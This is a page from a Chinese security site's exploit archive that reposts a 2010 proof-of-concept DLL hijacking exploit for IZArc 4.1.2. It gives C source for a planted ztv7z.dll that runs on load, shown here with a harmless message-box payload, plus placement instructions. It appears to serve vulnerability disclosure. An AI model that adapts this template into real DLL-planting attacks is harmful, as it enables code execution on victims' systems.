首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IZArc DLL Hijacking (ztv7z.dll) Exploit 来源：anastasiosm[at]gmail[dot]com 作者：Monachos 发布时间：2010-09-07   /* Exploit Title: IZArc DLL Hijacking Exploit (ztv7z.dll) Date: 01/09/2010 Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com Software Version: IZArc 4.1.2.2012 Vendor Site: http://www.izarc.org/ Vulnerable Extensions: rar, zip, jar (and probably many more) Tested Under: winxp_sp2_gdr.050301-1519 Instructions: 1. Compile the following code 2. Create a file of the affected extensions in the same directory as the dll 3. Execute file.<extension> */ #include <windows.h> int dll_m0nk() {     MessageBox(0, "IZArc is vulnerable to DLL Hijacking", "secuid0", MB_OK); return 1; } BOOL APIENTRY DllMain( HMODULE hModule,                        DWORD  ul_reason_for_call,                        LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: dll_m0nk(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·HP OpenView NNM webappmon.exe ·phpcrs <= 3.Za / Local File In ·Gantry Framework 3.0.10 (Jooml ·win32/vista sp1 ING. (cmd.exe) ·myBB 1.0.6 Denial of Service E ·Novell Netware NWFTPD RMD/RNFR ·Java Bridge v. 5.5 Directory T ·ColdCalendar 2.06 SQL Injectio ·ColdUserGroup 1.06 Blind SQL I ·phpBB 3.0.7-PL1 - Denial Of Se ·QQPlayer 2.3.696.400p1(.wav) D ·SMF 2.0 RC3 - Denial Of Servic   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved